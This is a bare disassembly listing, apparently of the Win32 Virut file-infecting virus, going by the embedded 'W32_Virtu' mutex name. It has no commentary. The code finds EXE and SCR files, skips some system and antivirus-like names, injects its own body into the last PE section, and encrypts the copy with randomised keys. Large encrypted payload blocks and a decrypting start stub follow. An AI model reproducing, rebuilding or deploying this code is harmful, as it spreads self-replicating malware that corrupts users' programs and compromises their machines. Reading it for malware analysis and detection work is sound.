pop [esp-0Ch+arg_24]
popa
jmp short loc_31429FC6
; ---------------------------------------------------------------------------
locret_31429FAB: ; CODE XREF: sub_31429FAC-F�j
retn
; END OF FUNCTION CHUNK FOR sub_31429FAC
; =============== S U B R O U T I N E =======================================
sub_31429FAC proc near ; CODE XREF: sub_31429FAC-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 31429E8D SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_31429634
popa
loc_31429FBF: ; CODE XREF: sub_31429FAC-26�j
test eax, 80000000h
jnz short loc_31429FD4
loc_31429FC6: ; CODE XREF: sub_31429FAC-3�j
sub eax, [edi+0Ch]
jb short loc_31429FD4
cmp eax, [edi+8]
jb loc_31429F10
loc_31429FD4: ; CODE XREF: sub_31429FAC-F9�j
; sub_31429FAC-EB�j ...
dec ecx
jnz loc_31429E8D
loc_31429FDB: ; CODE XREF: sub_31429DF3+9�j
; UPX2:31429E75�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3142A026
; ---------------------------------------------------------------------------
loc_31429FEA: ; CODE XREF: sub_31429FAC-7F�j
; sub_31429FAC-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3142A026: ; CODE XREF: sub_31429FAC+3C�j
pop edi
pop esi
retn
sub_31429FAC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142A029 proc near ; CODE XREF: UPX2:3142A1F7�p
; sub_3142A21F+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3142A0FA
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3142A0FA
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3142A5B2
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3142A5A6
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3142A5A6
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3142A5A6
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3142A57E
mov [ebp+403972h], eax
locret_3142A0FA: ; CODE XREF: sub_3142A029+10�j
; sub_3142A029+27�j ...
retn
sub_3142A029 endp
; =============== S U B R O U T I N E =======================================
sub_3142A0FB proc near ; CODE XREF: sub_3142A21F+117�p
; sub_3142A21F+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3142A115
add eax, [ebp+40106Dh]
loc_3142A115: ; CODE XREF: sub_3142A0FB+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3142A0FB endp
; =============== S U B R O U T I N E =======================================
sub_3142A140 proc near ; CODE XREF: sub_3142A21F:loc_3142A26E�p
; sub_3142A21F+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3142A145: ; CODE XREF: sub_3142A140+23�j
jecxz short locret_3142A17C
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3142A17C
cmp dword ptr [edx+0Ch], 1
jb short loc_3142A145
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3142A17C: ; CODE XREF: sub_3142A140:loc_3142A145�j
; sub_3142A140+1D�j ...
retn
sub_3142A140 endp
; =============== S U B R O U T I N E =======================================
sub_3142A17D proc near ; CODE XREF: UPX2:3142A209�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3142A17D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3142A18A: ; CODE XREF: UPX2:3142A1AB�j
mov ecx, edi
jmp short loc_3142A199
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3142A195: ; CODE XREF: UPX2:3142A1A7�j
mov ebx, edi
xor ecx, ecx
loc_3142A199: ; CODE XREF: UPX2:3142A18C�j
; UPX2:3142A1AF�j
lodsb
cmp al, 61h
jb short loc_3142A1A4
cmp al, 7Ah
ja short loc_3142A1A4
sub al, 20h
loc_3142A1A4: ; CODE XREF: UPX2:3142A19C�j
; UPX2:3142A1A0�j
stosb
cmp al, 5Ch
jz short loc_3142A195
cmp al, 2Eh
jz short loc_3142A18A
cmp al, 0
jnz short loc_3142A199
jecxz short locret_3142A17C
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3142A1C7
cmp eax, 524353h
jnz locret_3142A0FA
loc_3142A1C7: ; CODE XREF: UPX2:3142A1BA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3142A0FA
cmp eax, 4E554357h
jz locret_3142A0FA
cmp eax, 32334357h
jz locret_3142A0FA
cmp eax, 4F545350h
jz locret_3142A0FA
xor ebx, ebx
call sub_3142A029
jz locret_3142A0FA
xor edx, edx
call sub_3142A21F
call sub_3142A17D
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3142A55C
; =============== S U B R O U T I N E =======================================
sub_3142A21F proc near ; CODE XREF: UPX2:3142A204�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3142A55C
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3142A55C
test dword ptr [ebx+16h], 2000h
jnz loc_3142A55C
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3142A55C
jecxz short loc_3142A26E
cmp ecx, 101h
jbe loc_3142A55C
loc_3142A26E: ; CODE XREF: sub_3142A21F+41�j
call sub_3142A140
jb loc_3142A55C
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_31428D78
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3142A298: ; CODE XREF: sub_3142A21F+92�j
push 20h
dec cl
pop eax
js short loc_3142A2B3
call sub_31428D78
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3142A298
; ---------------------------------------------------------------------------
loc_3142A2B3: ; CODE XREF: sub_3142A21F+7E�j
; sub_3142A21F+CD�j ...
push 6
pop ecx
loc_3142A2B9: ; CODE XREF: sub_3142A21F+B8�j
push 6
pop eax
call sub_31428D78
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3142A2B9
test dword ptr [ebp+403431h], 8
jnz short loc_3142A2EE
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3142A2B3
loc_3142A2EE: ; CODE XREF: sub_3142A21F+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3142A315
cmp byte ptr [ebp+403429h], 5
jz short loc_3142A2B3
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3142A2B3
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3142A2B3
loc_3142A315: ; CODE XREF: sub_3142A21F+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142A32A
cmp byte ptr [ebp+403429h], 2
ja short loc_3142A2B3
loc_3142A32A: ; CODE XREF: sub_3142A21F+100�j
and dword ptr [ebp+4039AEh], 0
call loc_314297C5
call sub_3142A0FB
call sub_3142A565
mov ebx, [ebp+403976h]
call sub_3142A029
jz loc_3142A55C
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3142A140
jb loc_3142A55C
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3142A392
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3142A392: ; CODE XREF: sub_3142A21F+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3142A3A6
rep movsb
loc_3142A3A6: ; CODE XREF: sub_3142A21F+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3142A45E
push dword ptr [ebx+28h]
call sub_3142952D
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3142A45E
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3142A3E3
xor ecx, ecx
loc_3142A3E3: ; CODE XREF: sub_3142A21F+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3142A44A
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3142A423
neg dword ptr [eax]
loc_3142A423: ; CODE XREF: sub_3142A21F+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3142A441
neg dword ptr [eax]
loc_3142A441: ; CODE XREF: sub_3142A21F+21E�j
push ecx
call sub_3142A0FB
pop ecx
jmp short loc_3142A456
; ---------------------------------------------------------------------------
loc_3142A44A: ; CODE XREF: sub_3142A21F+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3142A456: ; CODE XREF: sub_3142A21F+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3142A45E: ; CODE XREF: sub_3142A21F+191�j
; sub_3142A21F+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3142A477
imul edx, 12345678h
loc_3142A477: ; CODE XREF: sub_3142A21F+250�j
mov [eax-1], dl
call near ptr dword_31428200+24Bh
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3142A4A8
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3142A4A8: ; CODE XREF: sub_3142A21F+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142A4CD
push edx
call sub_31429DF3
pop edx
loc_3142A4CD: ; CODE XREF: sub_3142A21F+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3142A4D8
mov [ebx+28h], ecx
loc_3142A4D8: ; CODE XREF: sub_3142A21F+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3142A4E9
mov [edx+8], ecx
loc_3142A4E9: ; CODE XREF: sub_3142A21F+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3142A51A
add ecx, [ebp+40106Dh]
loc_3142A51A: ; CODE XREF: sub_3142A21F+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3142A53C
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3142A53C
mov dh, [ebp+403430h]
loc_3142A53C: ; CODE XREF: sub_3142A21F+307�j
; sub_3142A21F+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3142A553
loc_3142A548: ; CODE XREF: sub_3142A21F+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3142A548
jmp short loc_3142A55C
; ---------------------------------------------------------------------------
loc_3142A553: ; CODE XREF: sub_3142A21F+327�j
; sub_3142A21F+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3142A553
loc_3142A55C: ; CODE XREF: UPX2:3142A21A�j
; sub_3142A21F+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3142A21F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142A565 proc near ; CODE XREF: sub_3142A21F+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3142A0FA
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3142A57E: ; CODE XREF: sub_3142A029+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3142A5A6: ; CODE XREF: sub_3142A029+6B�j
; sub_3142A029+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3142A5B2: ; CODE XREF: sub_3142A029+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3142A565 endp
; ---------------------------------------------------------------------------
db 0E8h, 2 dup(0)
dd 6A5D0000h, 49ED8101h, 58004033h, 85C10FF0h, 401580h
dd 83C3C085h, 0FF0FFC8h, 158085C1h, 3DC30040h, 2A0010h
dd 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h, 0E80575FFh
dd 0FFFFFB7Eh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh, 25B812h
dd 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h, 40384Eh
dd 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h
dd 4035F8h, 8108C483h, 3F3F5C3Eh, 8303755Ch, 2BE804C6h
dd 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h, 2FB8B1h
dd 10E80000h, 0C2000000h, 30B80020h, 0E8000000h, 3, 8D0024C2h
dd 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
dd 3024548Bh, 811A8B5Dh, 403413EDh, 0E539E800h, 0C261FFFFh
dd 7020004h, 5010603h, 32607937h, 15FF11C4h, 1001194h
dd 0C3906890h, 0C48BED01h, 5B93D0FFh, 59E8h, 24648B00h
dd 4EBB808h, 0FAEB0000h, 18A16764h, 30408B00h, 240B60Fh
dd 7500F883h, 0E83Ch, 815D0000h, 402334EDh, 7B858B00h
dd 3004023h, 40238385h, 8BF08B00h, 40237F85h, 83850300h
dd 50004023h, 0C933FE8Bh, 8B8532ACh, 0AA004023h, 3B41h
dd 27h dup(0)
dd 809B4700h, 8308AD7Ch, 9103317Ch, 80ADA07Ch, 7Ch, 2 dup(0)
dd 80BDB600h, 801A247Ch, 80945C7Ch, 8023677Ch, 81042C7Ch
dd 8106377Ch, 864B0F7Ch, 80C0587Ch, 80E7EC7Ch, 81153C7Ch
dd 810A777Ch, 831C457Ch, 80B6A17Ch, 8608FF7Ch, 835DCA7Ch
dd 8111DA7Ch, 812ADE7Ch, 801D777Ch, 80B9057Ch, 80BB767Ch
dd 8309E17Ch, 863DE57Ch, 863F587Ch, 8127827Ch, 831CB87Ch
dd 8024427Ch, 810B1C7Ch, 80B9747Ch, 809A517Ch, 810D877Ch
dd 90D4607Ch, 90D6827Ch, 90D7547Ch, 90D7697Ch, 90D7937Ch
dd 90DC557Ch, 90DCFD7Ch, 90DD907Ch, 90DEB67Ch, 90EA327Ch
dd 9130C67Ch, 7Ch, 14h dup(0)
a68:
unicode 0, <68>
dw 0A8E0h
aB1 db 'B1\',0
aB db 'B',0
aAsenamedobject:
unicode 0, <aseNamedObjects\W32_Virtu>,0
dd 0BBh dup(0)
dd 51000000h, 0Ch dup(0)
dd 0D4000000h, 24h, 18F0h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_31431016
call sub_31431054
mov ebp, fs:0
add ebp, 8
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31431016 proc near ; CODE XREF: start+3�p
sub edx, edx
sub ecx, ecx
mov cl, 0F0h
loc_3143101C: ; CODE XREF: sub_31431016+7�j
inc edx
loop loc_3143101C
call sub_31431051
sub ebx, 0FFFF9024h
push ebx
mov esi, 249Dh
loc_31431030: ; CODE XREF: sub_31431016+29�j
xchg al, [ebx]
sub ax, dx
xchg al, [ebx]
inc ebx
inc edx
sub esi, 1
cmp esi, 0
ja short loc_31431030
pop ebx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ebx
sub_31431016 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31431051 proc near ; CODE XREF: sub_31431016+9�p
pop ebx
push ebx
retn
sub_31431051 endp
; =============== S U B R O U T I N E =======================================
sub_31431054 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_31431054 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 2Dh
dd 100h, 0ED81B573h, 301006h, 1082858Dh, 8B660030h, 0FFFF9B90h
dd 0FF84E8FFh, 0B87AFFFFh, 9FF16C2h, 0BB247013h, 140B2323h
dd 0AAED6B1Dh, 28EAF167h, 994AB9A9h, 87D788F2h, 7CC619C7h
dd 0C53D8218h, 0EAFBC795h, 12B97809h, 2878F2DFh, 110CDFBAh
dd 5C9F7262h, 5B0809BCh, 78D56667h, 0E9F8C6EEh, 0F8C7A708h
dd 21F4752Ch, 7B1EBB08h, 46AE82F2h, 0AE45EBAh, 2048DB9Bh
dd 0EA0584A9h, 88B25D6Ah, 0C209790Ah, 0F2853D91h, 0F4B6D989h
dd 0DEABE55h, 25739F9Eh, 0C40D898Dh, 84A64477h, 670D3D0Fh
dd 0FBDF133Ah, 0C79024DEh, 10EA55B0h, 355FE1A1h, 0C5348E98h
dd 88AA515Bh, 0E1EF2C7Eh, 0AA944D41h, 0E84B1222h, 96ED5C5Fh
dd 0B5B2AA64h, 0F7801110h, 0DB1CADC7h, 0FA9682B1h, 87BC4EC4h
dd 68251515h, 16C04A26h, 1C9C2BA7h, 0AA82C1E4h, 0E64C9EB8h
dd 6A1685B4h, 95224B08h, 59A81828h, 29D8BBD4h, 0D08926AAh
dd 9E85C4E1h, 1F72B3F7h, 0F119B8ACh, 8E6439F5h, 53F31B1Bh
dd 2CE354D9h, 7C4AAFADh, 2577F79Dh, 0F9E26D5Ch, 515C3C85h
dd 9854592Ah, 53261E2Eh, 1FC97D55h, 0CCC1B65Bh, 0B3BBEFC8h
dd 0D140BB44h, 871FBEA1h, 1467C83Fh, 0D9B221F5h, 48E82CE1h
dd 486B7F3h, 0BE8EEDFDh, 0D439C2CEh, 1D4A91A0h, 0F96BDABAh
dd 0AD20DB24h, 0A0FF5E41h, 28CCB876h, 2F920103h, 11DCFEC4h
dd 0A4AE94A2h, 9566C865h, 0DE55A626h, 0A502417Fh, 425A472Ch
dd 4430F703h, 2433CDAEh, 46426B1Eh, 152820ECh, 0D1A185BCh
dd 0A0AE8772h, 65193440h, 0E98440F8h, 6E25227h, 0B0BE6598h
dd 1874D3C9h, 243B0DE8h, 2CF0F37Ah, 12C6C0BFh, 0A99A6009h
dd 8AE55052h, 552E9DF3h, 7FE219E5h, 62C10004h, 0EA8F75B8h
dd 1154C3C0h, 0C4F65D0Ch, 67E85355h, 5BD9619Eh, 0F17B83BFh
dd 0EBC4325Ah, 0D59B827Bh, 1657F6EEh, 0C7A01005h, 3B0ACFA7h
dd 5FDCA391h, 4D7DECEBh, 0EDC7349Fh, 0D4488014h, 7E50A3C2h
dd 0FA887A87h, 0D01FB65Bh, 71321B27h, 0A880EFDEh, 0F0C8B4BCh
dd 3A126B81h, 0D013CCCBh, 0CDEB5A51h, 3AECF5A1h, 0D5B7A997h
dd 0AAB3E54Fh, 4E40F508h, 3D27AAFDh, 6FF3C27Fh, 0D0AA1BDCh
dd 355DDEE2h, 6C3DAC9Ah, 0AD84AC70h, 8B55B43Eh, 0BF1AB9ABh
dd 0FECD3A1h, 0D39D3722h, 37CEDBE5h, 99BFAF9Dh, 3786F8F7h
dd 0F9D3407Bh, 6F8C0901h, 0FD99D5E4h, 5035901Fh, 9EFA594Ch
dd 5968340Dh, 0B37304FAh, 0E7514A44h, 0CD208F8Fh, 0A0455952h
dd 0D8C3DD21h, 970E9E5h, 0D1C7B583h, 0B6BFD570h, 0FFD9B7B8h
dd 48DF159Fh, 1EE7DBDAh, 0DC8609A1h, 57FF768Eh, 0EACC37B6h
dd 3893322Ah, 32F6D6F7h, 4CD96A93h, 4DE8D1DDh, 37B92826h
dd 29037396h, 5FB30637h, 731D0534h, 0DC164F27h, 0CC2DE869h
dd 0D918E201h, 88EBD229h, 0A11E1F73h, 465A2908h, 0BF85B107h
dd 0C6E5250h, 0ADD365D4h, 11DE821Ch, 0E5BF6329h, 846F7876h
dd 0D256864Dh, 0A430EF38h, 801DB7F8h, 3D2FF448h, 9F7887B2h
dd 0E8A8FDBBh, 3266BFF2h, 7C55C4ABh, 94DF6405h, 5EE73204h
dd 74BB3460h, 2123EAD9h, 0BFAD74F7h, 0BE0F7E1Ch, 0F458AD12h
dd 0A2A67BDCh, 43EE3159h, 0F5DA4C8h, 0CF7EED8Ch, 11A26636h
dd 0B5877E2Fh, 0DD5BFAE5h, 0C45A914Ah, 14EE63D8h, 5E8D2AA5h
dd 1181C0FFh, 0F1CB322Ch, 9EE66B09h, 955E204Dh, 4B251726h
dd 17C27559h, 0F4B64A57h, 0ABB4EAA0h, 0B55BC26Eh, 0D618B7A9h
dd 8861D0D9h, 0BAC47555h, 68A51417h, 857DBC2h, 0F8E29190h
dd 92A42C5Eh, 0BE4B8AC9h, 0BB4F0A47h, 92B941Ch, 4DF8574Eh
dd 0D61DAFAh, 241F0607h, 7FD4736Eh, 7B6BD24Bh, 0D865BC43h
dd 0BD65AB49h, 31133869h, 3944B3B1h, 0D6E8B89Eh, 8F872130h
dd 2B48E6E7h, 910FBEBDh, 721DC74h, 0A8FE5D40h, 3B11E070h
dd 48C7A9AEh, 30F630DDh, 5AE71191h, 59F9248Ch, 0B7B6150Eh
dd 0D802056Eh, 4165BD2Dh, 0BBBBBB02h, 284A4C4Bh, 692A1C75h
dd 290898Ah, 0E0890479h, 8F808442h, 747C9756h, 42C15105h
dd 36CC1ADBh, 24E91D97h, 64F1A7BDh, 1C52592Fh, 470E5100h
dd 8865D4BEh, 0F0B5459Dh, 7D23D751h, 0A6C40846h, 0AE75E4E0h
dd 0D65CBFE7h, 1CE4FD4Eh, 5227C1F1h, 0D37CCA8Ah, 58B65554h
dd 67EC8CDh, 3587B4B7h, 0E9F21ACCh, 4755BBFFh, 59213BCBh
dd 2B1A8106h, 0E7E9687Bh, 0A6CD5CCCh, 6EEE15B9h, 7C5041Fh
dd 1ECBFFE5h, 0D758C7C6h, 0E26F84EEh, 87135B6Ah, 5C058F6Eh
dd 59840304h, 0EFC837C8h, 0A488180h, 0D20A9B03h, 0CCA47C45h
dd 0D1645E59h, 5352F7F7h, 6AD3347Bh, 0A6BD5F6Ch, 0C3F56C83h
dd 13D33232h, 0CF98025Bh, 48A33032h, 49EA3F56h, 6807F3C3h
dd 0A45FE1Dh, 3F40DFDEh, 8961F084h, 0D2AB0AB8h, 1BF56462h
dd 653EADACh, 0AF87F6F6h, 7821611h, 7230531Ch, 203D78D3h
dd 2EDBDD99h, 423B8984h, 0D32D1EDh, 0D7E798B7h, 91B60C27h
dd 366AEEE9h, 0EC02858Ah, 0AAD87654h, 4DFB1F1Dh, 836C7C1h
dd 0D98D889Dh, 92A53235h, 0B21FEEAh, 0E60BBCABh, 0B7DD6546h
dd 67FE2C09h, 1A26D3C7h, 0D4F9B99Ah, 71BB042Ch, 2C4DFBE2h
dd 0E72FDB9Dh, 0BBC24443h, 4B6F1D3Fh, 333ACBDCh, 0DEE14103h
dd 56B8382Dh, 3A49F8F0h, 0EA078ABAh, 0E1DD494Ch, 4A660031h
dd 1D18DEC8h, 0DAF76074h, 62920C4Fh, 54CECF9h, 0F31E8E8Dh
dd 0D7CC4749h, 4F682647h, 1727CDCFh, 0B9DC087Dh, 62B7263Bh
dd 304DFEE9h, 0EA10A3E5h, 82D34769h, 437D0C39h, 0F27A3ABh
dd 0C4DD7869h, 4B923012h, 44AF2F7h, 0A11D9D81h, 0ACB65475h
dd 60691712h, 7E30A9ACh, 8AEB6B48h, 7C9C3C37h, 365BE7C4h
dd 0C91AA48Eh, 0AAC57550h, 58420A1Bh, 0E434B2ACh, 0AECC705Ah
dd 13AD3E37h, 0E41C1E3h, 0C20A9E97h, 82A17355h, 5566E2E4h
dd 841AB3B9h, 99D17152h, 509F333Bh, 2E5DCBCEh, 0EBE49D90h
dd 87AE7D3Bh, 4D78E1D0h, 0EF2AAC9Eh, 0B5EF1759h, 6B973715h
dd 0D54C3D9h, 0D9E1B4F4h, 85BC5868h, 576E8EEh, 0CD6191A9h
dd 0BCFD6E7Eh, 79981108h, 958C3E4h, 0C4E69B85h, 0B8BF2F28h
dd 377ECD8Ah, 0E90ABA83h, 92DD6A71h, 7C9D150Eh, 1033DFC4h
dd 0DCE6BEFAh, 0BDB82226h, 2571E1E1h, 0F1089AD7h, 0BBD86C45h
dd 5B890B18h, 0D09B3F2h, 0D3E4AA8Dh, 0B9B10930h, 4944FCF9h
dd 0FD0FA995h, 0B9D84A62h, 558E0C20h, 2E20D8DFh, 0DDE14F00h
dd 6EA91A27h, 3857F6F1h, 0FA1F8CDCh, 0ADC44345h, 4147425Ch
dd 723ECACBh, 0D8FB7153h, 37AD3E29h, 3642D8A7h, 0FD22DFABh
dd 88FC4D48h, 7804161Eh, 1C0BC8D9h, 0CAD6636Ah, 6588223Bh
dd 224FEDEDh, 0FE20E2A3h, 88D46A58h, 47682610h, 0A35CBD1h
dd 0B5FF5A09h, 6F883A14h, 3140F5CFh, 0FB1AB6E5h, 0B2C05F4Ah
dd 416B1416h, 0C36AB94h, 0ADDB6A43h, 5BE73339h, 2244EDF7h
dd 0CD388489h, 0EAA05D5Eh, 40640E2Ch, 123F83A0h, 0B3EE0F6Ah
dd 65803D19h, 2863D6D2h, 0C8159D82h, 9EA35250h, 527B102Ah
dd 0F517C8A6h, 0ABC66051h, 7AAB392Fh, 1336C0C8h, 0C20DAD9Ah
dd 0A0AC4C59h, 5F70EDF3h, 0CA5CB8B8h, 0A8D45661h, 46952B3Fh
dd 55AC7D5h, 0D2C78282h, 0B0B8753Bh, 4977E0F6h, 0E43A9DABh
dd 0BEC6716Ch, 54872C61h, 0A6ADBCBh, 0CBCA8391h, 82AC5B6Dh
dd 4077E7EEh, 0FA2DA59Fh, 0BAEA757Eh, 52F60008h, 34FE1D9h
dd 0DFFAA799h, 8AA12422h, 2677E4DEh, 0F92BD4BAh, 0B8CA6E51h
dd 6B9A0D34h, 692CDED9h, 0C1DB8EB4h, 9FB0302Bh, 3476D8F9h
dd 0FC09A2A3h
dd 0B6DF446Ch, 6CFC1218h, 930E5C7h, 0CFDD848Fh, 92BD3334h
dd 2644FFD9h, 0E70AB7A8h, 0DCDB4B4Dh, 57A81A23h, 392DC3DFh
dd 0CDE67369h, 64912728h, 3257FBFFh, 0F91A8FDCh, 0BDD14973h
dd 7B671500h, 1C22C8CDh, 0FAFA5064h, 57B63D22h, 2041E5E1h
dd 0CB26E0B8h, 80CF7968h, 5B700000h, 1A22DEBCh, 0D1EB6275h
dd 73873A2Ch, 3F44F998h, 0EF17868Ch, 90DB4A2Ch, 5A7B181Dh
dd 193FB9DDh, 0B39B6F64h, 0A933737h, 3040F8E8h, 0FD1895E5h
dd 0E7B55544h, 547F1431h, 0F31ADB0h, 0B7F1614Fh, 63891F30h
dd 5754CCFAh, 0C40E87A1h, 9EA15D40h, 777A183Ch, 1B39A8AAh
dd 0A3C4646Ch, 648A2E0Bh, 347DA3C4h, 0CA0F899Fh, 9D884250h
dd 3750EE1Bh, 0E42EA781h, 0BEC17D60h, 7D8B2D14h, 1C5BD4F1h
dd 0D3EEA6EEh, 95A44B5Dh, 5B71D1F5h, 0E8348AAFh, 89E61670h
dd 5FA12108h, 24149B94h, 0F883BEBDh, 9F8E5B5Eh, 7672F5EBh
dd 0D560B6ABh, 0A0E57E7Dh, 7CBF0D04h, 2245E9D3h, 0CAE3A7F4h
